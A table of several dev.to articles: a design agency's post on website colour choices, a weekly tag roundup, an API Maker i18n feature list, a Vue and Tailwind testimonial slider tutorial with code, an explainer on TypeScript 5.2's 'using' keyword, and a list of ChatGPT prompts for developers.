| id (int64) | title (string) | description (string) | collection_id (int64) | published_timestamp (timestamp[s]) | canonical_url (string) | tag_list (string) | body_markdown (string) | user_username (string) |
|---|---|---|---|---|---|---|---|---|
1,508,799 | Website design among different industries | At our Design Agency Design Agentur Form und Zeichen in Graz, we specialize in creating beautiful... | 0 | 2023-06-18T22:34:25 | https://dev.to/christofkarisch/website-design-among-different-industries-5eoi | design, webdev | At our Design Agency [Design Agentur Form und Zeichen in Graz](https://www.formundzeichen.at/), we specialize in creating beautiful websites that are tailored to each industry. In this article, we will showcase some of our clients' websites, highlighting the design concepts behind them. Join us as we explore the inspirations and ideas that brought these designs to life.
## Enduring metal
To convey a sense of durability, stability, and trust for our client [California Metals - Sustainable Metals](https://www.californiametals.com/), we aimed to create a visual impression that aligned with these values. While traditional metallic colors such as gray (steel), yellow (gold), red (copper), and blue (zinc, osmium) were considered, none of them seemed quite fitting. However, given our customer's commitment to supplying sustainable metals, we made a bold choice to incorporate a green metallic look. This distinctive color choice not only sets our client apart, but also emphasizes their unique company philosophy. Through this carefully crafted visual element, we aim to leave a lasting impression that resonates with their target audience.
## Colorful statements
When working with our esteemed client [Aktiver Tierschutz Austria](https://die-tierretter.at/), we had a distinct vision in mind. Our goal was to draw attention to their noble mission of aiding animals while evoking positive emotions through visually appealing marketing materials. To achieve this, we opted for a vibrant and modern design approach. The use of multiple colors became instrumental, with a particular emphasis on light and friendly tones such as yellow, light blue, and rosy hues. This intentional color palette aims to captivate viewers' attention, inviting them to appreciate the playful and engaging aspects of the design.
## Conclusion
The selection of colors for your design plays a pivotal role. Colors establish the foundation for how a design communicates with people, how it visually presents itself, and the emotions it evokes. It is essential to invest time in discovering the perfect color palette, as doing so can elevate your designs to new heights. By carefully considering and choosing the right colors, you can enhance the overall impact and effectiveness of your designs, ensuring they resonate with your target audience on a deeper level. Remember, the power of colors can take your designs to the next level and make a lasting impression.
| christofkarisch |
1,509,169 | Weekly Roundup 009 (Jun 12) - 🔥Hot Topics🔥 in workplace, sharepoint, and powerplatform | Hey fellow developers! It's @jaloplo, here to give you the latest scoop on what's been happening in... | 22,696 | 2023-06-19T07:49:36 | https://dev.to/jaloplo/weekly-roundup-jun-12-hot-topics-in-workplace-sharepoint-and-powerplatform-4d1d | roundup, workplace, sharepoint, powerplatform | Hey fellow developers! It's @jaloplo, here to give you the latest scoop on what's been happening in the [#workplace](https://dev.to/t/workplace), [#sharepoint](https://dev.to/t/sharepoint), and [#powerplatform](https://dev.to/t/powerplatform) communities. 😎
## [#workplace](https://dev.to/t/workplace)
- [Promising Future of Freelancing: Embracing Independence in the Digital Age](https://dev.to/bhavin9920/promising-future-of-freelancing-embracing-independence-in-the-digital-age-30e6) by [Bhavin Moradiya](https://dev.to/bhavin9920)
## [#powerplatform](https://dev.to/t/powerplatform)
- [From Novice to Ninja: Fueling Enterprise Skillset with low-Code](https://dev.to/balagmadhu/from-novice-to-ninja-fueling-enterprise-skillset-with-low-code-40jm) by [Bala Madhusoodhanan](https://dev.to/balagmadhu)
- [The LowCode Playbook](https://dev.to/wyattdave/the-lowcode-playbook-3897) by [david wyatt](https://dev.to/wyattdave)
- [Share Power Apps without Security Groups](https://dev.to/wyattdave/share-power-apps-without-security-groups-210) by [david wyatt](https://dev.to/wyattdave)
- [What is the PL-100 Exam? All You Need to Know](https://dev.to/citizendevacad/what-is-the-pl-100-exam-all-you-need-to-know-1im6) by [Citizen Development Academy](https://dev.to/citizendevacad)
That's all for this week's roundup! Thanks for tuning in, and remember to keep the discussions lively and informative in our tags. 💬 If you have any suggestions for future topics, feel free to drop them in the comments below. See you next week! 👋 | jaloplo |
1,510,374 | 🚀 API Maker - i18n Internationalization | ⭐ List of Features ⭐ ✅ Support multiple languages ▸ Internationalization enables you to... | 0 | 2023-10-23T03:31:45 | https://dev.to/apimaker/api-maker-i18n-internationalization-10c0 | ## ⭐ List of Features ⭐
✅ Support multiple languages
▸ Internationalization enables you to receive error or response messages in different languages from the API Maker.
✅ x-am-internationalization
▸ To receive a response or error message in a specific language, you have to set the **x-am-internationalization** value in the request header (see the sketch after this list).
✅ Predefined errors list
▸ There is a predefined list of errors. Users can map values against the error keys, and they will receive the mapped value in their error responses.
▸ Errors are supported for:
▸ Constant errors
▸ Custom API errors
▸ Third party API errors
✅ Symbols & Special characters
▸ Users can set symbols and special characters as response error messages.
✅ Quick effect
▸ No need to restart the project, just change the error message, and it will be reflected immediately.
✅ Switch languages in seconds
▸ Just provide the internationalization name in the header, and you will get error messages in the language you chose.
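To make this concrete, here is a minimal sketch of a client request that asks API Maker for localized messages. The endpoint URL and the language key `de` are placeholder assumptions; only the `x-am-internationalization` header name comes from the feature description above.
```python
import requests

# Hypothetical endpoint; replace with your API Maker instance and API path.
url = "https://your-api-maker-host/api/your-api-path"

# Ask API Maker to return response/error messages in the mapped language.
headers = {"x-am-internationalization": "de"}  # language key is an assumption

response = requests.get(url, headers=headers)
print(response.status_code)
print(response.json())  # localized messages appear in the response body
```
Swapping the header value between requests is all it takes to switch languages, which matches the "switch languages in seconds" behavior described above.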
----------------------------------
## YouTube video link
https://youtu.be/HBhubqm-5vw
## Websites
https://apimaker.dev
## API Docs link
https://docs.apimaker.dev/v1/docs/i18/i18.html
## Follow on twitter
https://twitter.com/api_maker
## Linked In
https://www.linkedin.com/company/api-maker | apimaker | |
1,510,409 | How to Build a Fancy Testimonial Slider with Tailwind CSS and Vue | Live Demo / Download -- Welcome to the third and final part of our series on How to Build... | 23,454 | 2023-06-20T09:01:25 | https://cruip.com/how-to-build-a-fancy-testimonial-slider-with-tailwind-css-and-vue/ | tailwindcss, vue, tutorial, webdev | ####**[Live Demo](https://cruip-tutorials-vue.vercel.app/fancy-testimonials-slider) / [Download](https://github.com/cruip/cruip-tutorials-vue/blob/main/src/components/FancyTestimonialsSlider.vue)**
---
Welcome to the third and final part of our series on **How to Build a Fancy Testimonial Slider with Tailwind CSS**! This post will guide you through the development of a **Vue** and **Tailwind CSS**\-based **fancy testimonial slider** featuring comprehensive TypeScript compatibility.
As usual, to get a better idea of how the final outcome will look, check out the live demo or one of our beautiful [Tailwind CSS templates](https://cruip.com/) (e.g., **Stellar**, a [dark landing page template](https://cruip.com/stellar/) based on Next.js).
Let’s get started with the tutorial. You can keep your favorite code editor open while you follow along.
Create the structure for the Vue component
------------------------------------------
To kick things off, let’s create a new file called `FancyTestimonialsSlider.vue` for our component and add the following code:
```ts
<script setup lang="ts">
import { ref } from 'vue'
import TestimonialImg01 from '../assets/testimonial-01.jpg'
import TestimonialImg02 from '../assets/testimonial-02.jpg'
import TestimonialImg03 from '../assets/testimonial-03.jpg'
const active = ref<number>(0)
const autorotate = ref<boolean>(true)
const autorotateTiming = ref<number>(7000)
interface Testimonial {
img: string
quote: string
name: string
role: string
}
const testimonials: Testimonial[] = [
{
img: TestimonialImg01,
quote: "The ability to capture responses is a game-changer. If a user gets tired of the sign up and leaves, that data is still persisted. Additionally, it's great to be able to select between formats.ture responses is a game-changer.",
name: 'Jessie J',
role: 'Ltd Head of Product'
},
{
img: TestimonialImg02,
quote: "I have been using this product for a few weeks now and I am blown away by the results. My skin looks visibly brighter and smoother, and I have received so many compliments on my complexion.",
name: 'Mark Luk',
role: 'Spark Founder & CEO'
},
{
img: TestimonialImg03,
quote: "As a busy professional, I don't have a lot of time to devote to working out. But with this fitness program, I have seen amazing results in just a few short weeks. The workouts are efficient and effective.",
name: 'Jeff Kahl',
role: 'Appy Product Lead'
}
]
</script>
<template>
<div class="w-full max-w-3xl mx-auto text-center">
<!-- ... -->
</div>
</template>
```
Firstly, note that we are using Vue 3's new `<script setup>` syntax, which allows us to use the Composition API inside the `script` tag without needing the `export default` boilerplate.
Next, we have imported the testimonials’ images and defined the variables `active`, `autorotate`, and `autorotateTiming`, which we have already used in the previous HTML and React components.
To ensure reactivity for these variables, we have used the `ref` function from Vue 3’s Composition API. This allows us to treat the variables as reactive without using the `data` object.
Additionally, we’ve defined the `testimonials` array that contains the properties for each testimonial, including the image, quote, name, and role.
Lastly, since we are adopting TypeScript, we’ve defined the `Testimonial` interface to specify the type of each testimonial property.
Great! Now, let’s move on to constructing the HTML structure of our component within the `template` tag:
```html
<template>
<div class="w-full max-w-3xl mx-auto text-center">
<!-- Testimonial image -->
<div class="relative h-32">
<div class="absolute top-0 left-1/2 -translate-x-1/2 w-[480px] h-[480px] pointer-events-none before:absolute before:inset-0 before:bg-gradient-to-b before:from-indigo-500/25 before:via-indigo-500/5 before:via-25% before:to-indigo-500/0 before:to-75% before:rounded-full before:-z-10">
<div class="h-32 [mask-image:_linear-gradient(0deg,transparent,theme(colors.white)_20%,theme(colors.white))]">
<template :key="index" v-for="(testimonial) in testimonials">
<img class="relative top-11 left-1/2 -translate-x-1/2 rounded-full" :src="testimonial.img" width="56" height="56" :alt="testimonial.name" />
</template>
</div>
</div>
</div>
<!-- Text -->
<div class="mb-9 transition-all duration-150 delay-300 ease-in-out">
<div class="relative flex flex-col">
<template :key="index" v-for="(testimonial) in testimonials">
<div class="text-2xl font-bold text-slate-900 before:content-['\201C'] after:content-['\201D']">{{ testimonial.quote }}</div>
</template>
</div>
</div>
<!-- Buttons -->
<div class="flex flex-wrap justify-center -m-1.5">
<template :key="index" v-for="(testimonial, index) in testimonials">
<button
class="inline-flex justify-center whitespace-nowrap rounded-full px-3 py-1.5 m-1.5 text-xs shadow-sm focus-visible:outline-none focus-visible:ring focus-visible:ring-indigo-300 dark:focus-visible:ring-slate-600 transition-colors duration-150"
:class="active === index ? 'bg-indigo-500 text-white shadow-indigo-950/10' : 'bg-white hover:bg-indigo-100 text-slate-900'"
@click="active = index"
>
<span>{{ testimonial.name }}</span> <span :class="active === index ? 'text-indigo-200' : 'text-slate-300'">-</span> <span>{{ testimonial.role }}</span>
</button>
</template>
</div>
</div>
</template>
```
While in React we employed the `map()` method to iterate over the `testimonials` array, in Vue 3 we have used a `template` tag with the `v-for` attribute to render each testimonial.
To add dynamic behavior to the buttons, we’ve used the `:class` directive. This allows us to apply different classes to the buttons based on whether they represent the active testimonial or not. The active state is denoted by the classes `bg-indigo-500 text-white shadow-indigo-950/10`, while the inactive state uses the classes `bg-white hover:bg-indigo-100 text-slate-900`.
To handle user interaction, we’ve added an `@click` event to each button, which updates the active testimonial index.
We’re making solid progress, but we still need to show only the active testimonial and define the fancy transitions, which are a visually appealing feature of this component.
Show only the active testimonial and define transitions
-------------------------------------------------------
We will accomplish these two tasks in a single step by using a transition component. We’ll use the [Headless UI](https://headlessui.com/) library instead of Vue 3’s built-in Transition component. If you’ve followed our previous tutorial on creating a video modal component, you might already be familiar with this preference.
Let’s start by installing Headless UI using the command `npm install @headlessui/vue@latest`.
Once installed, we can import the `TransitionRoot` component and wrap the image and text of the active testimonial within it:
```ts
<script setup lang="ts">
import { ref } from 'vue'
import { TransitionRoot } from '@headlessui/vue'
import TestimonialImg01 from '../assets/testimonial-01.jpg'
import TestimonialImg02 from '../assets/testimonial-02.jpg'
import TestimonialImg03 from '../assets/testimonial-03.jpg'
const active = ref<number>(0)
const autorotate = ref<boolean>(true)
const autorotateTiming = ref<number>(7000)
interface Testimonial {
img: string
quote: string
name: string
role: string
}
const testimonials: Testimonial[] = [
{
img: TestimonialImg01,
quote: "The ability to capture responses is a game-changer. If a user gets tired of the sign up and leaves, that data is still persisted. Additionally, it's great to be able to select between formats.ture responses is a game-changer.",
name: 'Jessie J',
role: 'Ltd Head of Product'
},
{
img: TestimonialImg02,
quote: "I have been using this product for a few weeks now and I am blown away by the results. My skin looks visibly brighter and smoother, and I have received so many compliments on my complexion.",
name: 'Mark Luk',
role: 'Spark Founder & CEO'
},
{
img: TestimonialImg03,
quote: "As a busy professional, I don't have a lot of time to devote to working out. But with this fitness program, I have seen amazing results in just a few short weeks. The workouts are efficient and effective.",
name: 'Jeff Kahl',
role: 'Appy Product Lead'
}
]
</script>
<template>
<div class="w-full max-w-3xl mx-auto text-center">
<!-- Testimonial image -->
<div class="relative h-32">
<div class="absolute top-0 left-1/2 -translate-x-1/2 w-[480px] h-[480px] pointer-events-none before:absolute before:inset-0 before:bg-gradient-to-b before:from-indigo-500/25 before:via-indigo-500/5 before:via-25% before:to-indigo-500/0 before:to-75% before:rounded-full before:-z-10">
<div class="h-32 [mask-image:_linear-gradient(0deg,transparent,theme(colors.white)_20%,theme(colors.white))]">
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
class="absolute inset-0 h-full -z-10"
enter="transition ease-[cubic-bezier(0.68,-0.3,0.32,1)] duration-700 order-first"
enterFrom="opacity-0 -rotate-[60deg]"
enterTo="opacity-100 rotate-0"
leave="transition ease-[cubic-bezier(0.68,-0.3,0.32,1)] duration-700"
leaveFrom="opacity-100 rotate-0"
leaveTo="opacity-0 rotate-[60deg]"
>
<img class="relative top-11 left-1/2 -translate-x-1/2 rounded-full" :src="testimonial.img" width="56" height="56" :alt="testimonial.name" />
</TransitionRoot>
</template>
</div>
</div>
</div>
<!-- Text -->
<div class="mb-9 transition-all duration-150 delay-300 ease-in-out">
<div class="relative flex flex-col" ref="testimonialsRef">
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
enter="transition ease-in-out duration-500 delay-200 order-first"
enterFrom="opacity-0 -translate-x-4"
enterTo="opacity-100 translate-x-0"
leave="transition ease-out duration-300 delay-300 absolute"
leaveFrom="opacity-100 translate-x-0"
leaveTo="opacity-0 translate-x-4"
>
<div class="text-2xl font-bold text-slate-900 before:content-['\201C'] after:content-['\201D']">{{ testimonial.quote }}</div>
</TransitionRoot>
</template>
</div>
</div>
<!-- Buttons -->
<div class="flex flex-wrap justify-center -m-1.5">
<template :key="index" v-for="(testimonial, index) in testimonials">
<button
class="inline-flex justify-center whitespace-nowrap rounded-full px-3 py-1.5 m-1.5 text-xs shadow-sm focus-visible:outline-none focus-visible:ring focus-visible:ring-indigo-300 dark:focus-visible:ring-slate-600 transition-colors duration-150"
:class="active === index ? 'bg-indigo-500 text-white shadow-indigo-950/10' : 'bg-white hover:bg-indigo-100 text-slate-900'"
@click="active = index"
>
<span>{{ testimonial.name }}</span> <span :class="active === index ? 'text-indigo-200' : 'text-slate-300'">-</span> <span>{{ testimonial.role }}</span>
</button>
</template>
</div>
</div>
</template>
```
By using the `:show` directive, we can control which testimonial is currently displayed while hiding the others. We’ve also applied Tailwind CSS classes to define entrance and exit animations.
As a result, when transitioning between testimonials, the text will gracefully fade in from the left, and the image will fade in with a clockwise rotation.
Improving UX during transitions
-------------------------------
Now, let’s make sure to provide an optimal user experience. As we have seen before, if one testimonial has more text than the others, the height of the testimonial will abruptly change during the transition, resulting in a less pleasant effect.
To prevent this from happening, we will add a method called `heightFix()` to our component, which calculates the height of the current testimonial and applies it to the parent element:
```ts
const heightFix = () => {
setTimeout(() => {
if (testimonialsRef.value && testimonialsRef.value.parentElement) testimonialsRef.value.parentElement.style.height = `${testimonialsRef.value.clientHeight}px`
}, 1)
}
```
The `heightFix()` method is fired when the `@before-enter` event is emitted by the transition component, just like this:
```html
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
enter="transition ease-in-out duration-500 delay-200 order-first"
enterFrom="opacity-0 -translate-x-4"
enterTo="opacity-100 translate-x-0"
leave="transition ease-out duration-300 delay-300 absolute"
leaveFrom="opacity-100 translate-x-0"
leaveTo="opacity-0 translate-x-4"
@before-enter="heightFix()"
>
<div class="text-2xl font-bold text-slate-900 before:content-['\201C'] after:content-['\201D']">{{ testimonial.quote }}</div>
</TransitionRoot>
</template>
```
Enabling autorotate functionality on component mount
----------------------------------------------------
Now, let’s add a final touch to our testimonial slider by enabling automatic rotation between testimonials. We want them to automatically rotate with a 7-second interval.
To do this, we will use Vue 3’s `onMounted()` hook, which allows us to execute code when the component is mounted:
```tsx
let interval: number
onMounted(() => {
if (!autorotate.value) return
interval = setInterval(() => {
active.value = active.value + 1 === testimonials.length ? 0 : active.value + 1
}, autorotateTiming.value)
})
```
We also need to ensure that the interval is cleared when the component is unmounted. We will use the `onUnmounted()` hook for that:
```ts
onUnmounted(() => clearInterval(interval))
```
Finally, we want to turn off the automatic rotation when the user interacts with the buttons. We’ll create a method called `stopAutorotate()` for this purpose. This method changes the `autorotate` variable from `true` to `false` and clears the interval:
```ts
const stopAutorotate = () => {
autorotate.value = false
clearInterval(interval)
}
```
To activate this method, we’ll simply call it when a user clicks on one of the buttons:
```html
@click="active = index; stopAutorotate();"
```
Et voilà! We have created an advanced testimonial component that provides an optimal user experience and visually appealing animations.
But there is still something we can do to improve it. Currently, using the component requires defining the testimonial properties directly within the component itself, limiting its flexibility. That’s why we want to make our component reusable.
Making the testimonial component reusable
-----------------------------------------
Here’s the plan: we’ll transfer the `testimonials` array to the parent component, which in this case is `FancyTestimonialSliderPage.vue`. Then, we will pass the array to the component through the `:testimonials` prop:
```ts
<script setup lang="ts">
import TestimonialImg01 from '../assets/testimonial-01.jpg'
import TestimonialImg02 from '../assets/testimonial-02.jpg'
import TestimonialImg03 from '../assets/testimonial-03.jpg'
import FancyTestimonialsSlider from '../components/FancyTestimonialsSlider.vue'
const testimonials = [
{
img: TestimonialImg01,
quote: "The ability to capture responses is a game-changer. If a user gets tired of the sign up and leaves, that data is still persisted. Additionally, it's great to be able to select between formats.ture responses is a game-changer.",
name: 'Jessie J',
role: 'Ltd Head of Product'
},
{
img: TestimonialImg02,
quote: "I have been using this product for a few weeks now and I am blown away by the results. My skin looks visibly brighter and smoother, and I have received so many compliments on my complexion.",
name: 'Mark Luk',
role: 'Spark Founder & CEO'
},
{
img: TestimonialImg03,
quote: "As a busy professional, I don't have a lot of time to devote to working out. But with this fitness program, I have seen amazing results in just a few short weeks. The workouts are efficient and effective.",
name: 'Jeff Kahl',
role: 'Appy Product Lead'
}
]
</script>
<template>
<FancyTestimonialsSlider :testimonials="testimonials" />
</template>
```
Of course, we will also need to modify the component we have created so that it can receive testimonial data from the outside. To do this, we will use the `defineProps()` function of Vue 3, which allows us to define the props of a component as follows:
```ts
const props = defineProps<{
testimonials: Testimonial[]
}>()
const testimonials = props.testimonials
```
Finally, now that our testimonials are defined in the parent component, we can safely remove the image imports in our testimonial component. We no longer need them since the parent component takes care of that.
And here we have our reusable testimonial component:
```ts
<script setup lang="ts">
import { ref, onMounted, onUnmounted } from 'vue'
import { TransitionRoot } from '@headlessui/vue'
const testimonialsRef = ref<HTMLElement | null>(null)
const active = ref<number>(0)
const autorotate = ref<boolean>(true)
const autorotateTiming = ref<number>(7000)
let interval: number
interface Testimonial {
img: string
quote: string
name: string
role: string
}
const props = defineProps<{
testimonials: Testimonial[]
}>()
const testimonials = props.testimonials
const heightFix = () => {
setTimeout(() => {
if (testimonialsRef.value && testimonialsRef.value.parentElement) testimonialsRef.value.parentElement.style.height = `${testimonialsRef.value.clientHeight}px`
}, 1)
}
const stopAutorotate = () => {
autorotate.value = false
clearInterval(interval)
}
onMounted(() => {
if (!autorotate.value) return
interval = setInterval(() => {
active.value = active.value + 1 === testimonials.length ? 0 : active.value + 1
}, autorotateTiming.value)
})
onUnmounted(() => clearInterval(interval))
</script>
<template>
<div class="w-full max-w-3xl mx-auto text-center">
<!-- Testimonial image -->
<div class="relative h-32">
<div class="absolute top-0 left-1/2 -translate-x-1/2 w-[480px] h-[480px] pointer-events-none before:absolute before:inset-0 before:bg-gradient-to-b before:from-indigo-500/25 before:via-indigo-500/5 before:via-25% before:to-indigo-500/0 before:to-75% before:rounded-full before:-z-10">
<div class="h-32 [mask-image:_linear-gradient(0deg,transparent,theme(colors.white)_20%,theme(colors.white))]">
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
class="absolute inset-0 h-full -z-10"
enter="transition ease-[cubic-bezier(0.68,-0.3,0.32,1)] duration-700 order-first"
enterFrom="opacity-0 -rotate-[60deg]"
enterTo="opacity-100 rotate-0"
leave="transition ease-[cubic-bezier(0.68,-0.3,0.32,1)] duration-700"
leaveFrom="opacity-100 rotate-0"
leaveTo="opacity-0 rotate-[60deg]"
>
<img class="relative top-11 left-1/2 -translate-x-1/2 rounded-full" :src="testimonial.img" width="56" height="56" :alt="testimonial.name" />
</TransitionRoot>
</template>
</div>
</div>
</div>
<!-- Text -->
<div class="mb-9 transition-all duration-150 delay-300 ease-in-out">
<div class="relative flex flex-col" ref="testimonialsRef">
<template :key="index" v-for="(testimonial, index) in testimonials">
<TransitionRoot
:show="active === index"
enter="transition ease-in-out duration-500 delay-200 order-first"
enterFrom="opacity-0 -translate-x-4"
enterTo="opacity-100 translate-x-0"
leave="transition ease-out duration-300 delay-300 absolute"
leaveFrom="opacity-100 translate-x-0"
leaveTo="opacity-0 translate-x-4"
@before-enter="heightFix()"
>
<div class="text-2xl font-bold text-slate-900 before:content-['\201C'] after:content-['\201D']">{{ testimonial.quote }}</div>
</TransitionRoot>
</template>
</div>
</div>
<!-- Buttons -->
<div class="flex flex-wrap justify-center -m-1.5">
<template :key="index" v-for="(testimonial, index) in testimonials">
<button
class="inline-flex justify-center whitespace-nowrap rounded-full px-3 py-1.5 m-1.5 text-xs shadow-sm focus-visible:outline-none focus-visible:ring focus-visible:ring-indigo-300 dark:focus-visible:ring-slate-600 transition-colors duration-150"
:class="active === index ? 'bg-indigo-500 text-white shadow-indigo-950/10' : 'bg-white hover:bg-indigo-100 text-slate-900'"
@click="active = index; stopAutorotate();"
>
<span>{{ testimonial.name }}</span> <span :class="active === index ? 'text-indigo-200' : 'text-slate-300'">-</span> <span>{{ testimonial.role }}</span>
</button>
</template>
</div>
</div>
</template>
```
And there you have it! We have reached the end of this tutorial and our mini-series on creating a fancy testimonial slider with Tailwind CSS. If you found this post helpful, don’t miss out on the previous parts covering Alpine.js and Next.js. Additionally, feel free to explore our [Tailwind CSS tutorials](https://cruip.com/tutorials/) section, where we showcase remarkable components and effects that seamlessly complement your projects.
| cruip_com |
1,510,736 | Typescript 5.2 - Using | TypeScript 5.2 is set to introduce a new keyword called 'using', which allows you to dispose of... | 0 | 2023-06-20T12:46:19 | https://dev.to/lingfei1999/typescript-52-using-1o0d | typescript, webdev |
TypeScript 5.2 is set to introduce a new keyword called 'using', which allows you to dispose of resources with a Symbol.dispose function when they go out of scope.
Here's an example of how it works:
```typescript
{
const getResource = () => {
return {
[Symbol.dispose]: () => {
console.log('Hooray!');
}
};
}
using resource = getResource();
} // 'Hooray!' logged to console
```
This feature is based on the TC39 proposal, which has recently reached Stage 3, indicating its upcoming inclusion in JavaScript.
The 'using' keyword will be particularly valuable for managing resources such as file handles, database connections, and more.
Symbol.dispose is a new global symbol in JavaScript. By assigning a function to Symbol.dispose, any object becomes a 'resource' – an object with a specific lifetime – that can be utilized with the 'using' keyword.
Here's an example of using Symbol.dispose:
```typescript
const resource = {
[Symbol.dispose]: () => {
console.log("Hooray!");
},
};
```
Additionally, TypeScript 5.2 will support Symbol.asyncDispose and 'await using' for handling asynchronously disposed resources.
For example:
```typescript
const getResource = () => ({
[Symbol.asyncDispose]: async () => {
await someAsyncFunc();
},
});
{
await using resource = getResource();
}
```
When the block exits, the code above will await the Symbol.asyncDispose function before continuing, making 'await using' useful for resources that require asynchronous disposal, such as database connections.
Here are a couple of use cases for the 'using' keyword:
File handles: Accessing the file system with file handles in Node.js becomes easier with 'using'.
Without 'using':
```typescript
import { open } from "node:fs/promises";
let filehandle;
try {
filehandle = await open("thefile.txt", "r");
} finally {
await filehandle?.close();
}
```
With 'using':
```typescript
import { open } from "node:fs/promises";
const getFileHandle = async (path: string) => {
const filehandle = await open(path, "r");
return {
filehandle,
[Symbol.asyncDispose]: async () => {
await filehandle.close();
},
};
};
{
await using file = await getFileHandle("thefile.txt");
// Do stuff with file.filehandle
} // Automatically disposed!
```
Database connections: Managing database connections becomes more streamlined with 'using'.
Without 'using':
```typescript
const connection = await getDb();
try {
// Do stuff with connection
} finally {
await connection.close();
}
```
With 'using':
```typescript
const getConnection = async () => {
const connection = await getDb();
return {
connection,
[Symbol.asyncDispose]: async () => {
await connection.close();
},
};
};
{
await using db = await getConnection();
// Do stuff with db.connection
} // Automatically closed!
```
Overall, the 'using' keyword in TypeScript 5.2 simplifies resource management by allowing automatic disposal of resources when they go out of scope, enhancing code clarity and reducing the chances of resource leaks.
https://www.open-consulting.co/writing/engineering/typescript_using | lingfei1999 |
1,510,768 | 50 ChatGPT Prompts for Developers | As you embark on your coding journey armed with these top ChatGPT prompts for developers, remember... | 0 | 2023-06-20T13:33:23 | https://dev.to/mursalfk/50-chatgpt-prompts-for-developers-4bp6 | developer, chatgpt, programming, cheatsheet | As you embark on your coding journey armed with these top ChatGPT prompts for developers, remember that the true magic lies in your creativity and determination. Coding is not just about writing lines of code; it's about solving problems, building solutions, and creating something meaningful. Embrace the challenges, learn from your mistakes, and never stop exploring. 💪💡
Whether you're working on personal projects, collaborating with a team, or contributing to open-source communities, your contributions matter. 👥🌐 The world of programming is full of endless opportunities and exciting possibilities. So, go ahead and dive into the world of programming with confidence. Let these prompts serve as your guide, mentor, and source of inspiration. ChatGPT is here to support you, but the true power to transform ideas into reality lies within you. ✨🚀
Keep coding, keep exploring, and keep pushing the boundaries of what's possible. The world is waiting for the amazing things you'll create. 🌍⚡️ So, grab your favorite editor, unleash your imagination, and let your creativity soar! Happy coding, and may your programming journey be filled with endless possibilities and great achievements! 🎉💻
| S.No.| Task Name | Prompt |
| --- | --- | --- |
| 1. | Code Review | "Please review my code and provide feedback." |
| 2. | Debugging Help | "I'm encountering an error in my code. Can you help me debug it?" |
| 3. | Algorithm Optimization | "How can I optimize this algorithm for better performance?" |
| 4. | Choosing a Programming Language | "Which programming language should I choose for my project?" |
| 5. | Framework Comparison | "What are the differences between Framework A and Framework B?" |
| 6. | Database Design | "Can you provide guidance on designing a database schema for my application?" |
| 7. | API Integration | "How do I integrate API X into my application?" |
| 8. | Version Control | "What's the best way to use Git for version control?" |
| 9. | Security Best Practices | "What are the recommended security practices for web development?" |
| 10. | Code Documentation | "How should I document my code for better readability?" |
| 11. | Performance Optimization | "What techniques can I use to improve the performance of my application?" |
| 12. | Unit Testing | "What is unit testing and how do I write effective unit tests?" |
| 13. | Continuous Integration | "How can I set up continuous integration for my project?" |
| 14. | Deployment Strategies | "What are the different deployment strategies I can use for my application?" |
| 15. | Error Handling | "What are the best practices for handling errors in my code?" |
| 16. | Code Refactoring | "How can I refactor my code to make it more maintainable?" |
| 17. | API Design | "What are the key principles for designing a well-structured API?" |
| 18. | Frontend Development | "What are the latest trends and best practices in frontend development?" |
| 19. | Backend Development | "What are the essential technologies and frameworks for backend development?" |
| 20. | Code Performance Profiling | "How can I profile my code to identify performance bottlenecks?" |
| 21. | Design Patterns | "Can you explain the concept of design patterns and provide examples?" |
| 22. | Code Modularization | "What strategies can I use to modularize my codebase?" |
| 23. | Code Licensing | "What are the different types of software licenses and their implications?" |
| 24. | Code Deployment | "How can I automate the deployment process for my application?" |
| 25. | Scalability | "What are the techniques for building scalable applications?" |
| 26. | Mobile App Development | "What are the recommended frameworks for mobile app development?" |
| 27. | Code Optimization | "How can I optimize my code for better efficiency?" |
| 28. | Designing RESTful APIs | "What are the key principles for designing RESTful APIs?" |
| 29. | Code Organization | "What is a good approach for organizing code files and folders?" |
| 30. | Error Logging | "What is the best way to log errors in a production environment?" |
| 31. | User Authentication | "How can I implement secure user authentication in my application?" |
| 32. | Code Review Etiquette | "What are the best practices for providing constructive code reviews?" |
| 33. | Code Versioning | "How can I effectively manage different versions of my code?" |
| 34. | Database Migration | "What is database migration and how can I perform it safely?" |
| 35. | Code Profiling Tools | "What are some useful tools for profiling code performance?" |
| 36. | Continuous Deployment | "How can I set up continuous deployment for my application?" |
| 37. | Web Scraping | "What are the techniques and tools for web scraping?" |
| 38. | API Authentication | "How can I implement authentication for my API endpoints?" |
| 39. | Secure Coding Practices | "What are the best practices for writing secure code?" |
| 40. | Error Monitoring | "How can I monitor and track errors in my live application?" |
| 41. | Code Review Checklist | "What are the important aspects to consider during a code review?" |
| 42. | Testing Frameworks | "What are some popular testing frameworks for different programming languages?" |
| 43. | Continuous Testing | "How can I automate the testing process for my application?" |
| 44. | REST API Design | "What are the key principles for designing a RESTful API?" |
| 45. | Code Documentation Tools | "What are some useful tools for generating code documentation?" |
| 46. | Code Review Collaboration | "How can I collaborate effectively during a code review process?" |
| 47. | Memory Management | "What are the best practices for managing memory in my code?" |
| 48. | Error Handling Strategies | "What are the different strategies for handling errors in software?" |
| 49. | Data Serialization | "How can I serialize and deserialize data in my application?" |
| 50. | Performance Testing | "What are the techniques and tools for performance testing my application?" |

Phew, writing this many prompts was quite the task! But don't worry, here are also some bonus prompts.
## Bonus Prompts:
1. "How can I improve the performance of my website/app?"
2. "What are the best practices for version control?"
3. "How do I handle user authentication and authorization securely?"
4. "What are some efficient data structures for my specific use case?"
5. "Can you recommend any resources for learning a new programming language?"
6. "What are the common security vulnerabilities in web applications and how can I prevent them?"
7. "How can I implement caching in my application for better performance?"
8. "What are the steps for deploying my application to a production server?"
9. "How can I optimize database queries for faster retrieval?"
10. "What are the principles of clean code and how can I apply them in my projects?"
In conclusion, programming is a thrilling adventure that opens doors to endless innovation and possibilities. 💻✨ By leveraging the power of ChatGPT and these top prompts for developers, you're equipped with a treasure trove of inspiration to fuel your coding endeavors. 🚀🔥 Whether you're a seasoned programmer or just starting, embrace the challenges, learn from each line of code, and let your imagination run wild. The world is your playground, waiting for you to create the next big thing. 🌍💡
So, don your coding cape and embark on this exciting journey! Let your creativity shine through your lines of code, solving problems and shaping the future. Remember, every bug you squash, every algorithm you optimize, and every project you build brings you one step closer to greatness. 🐞🔧
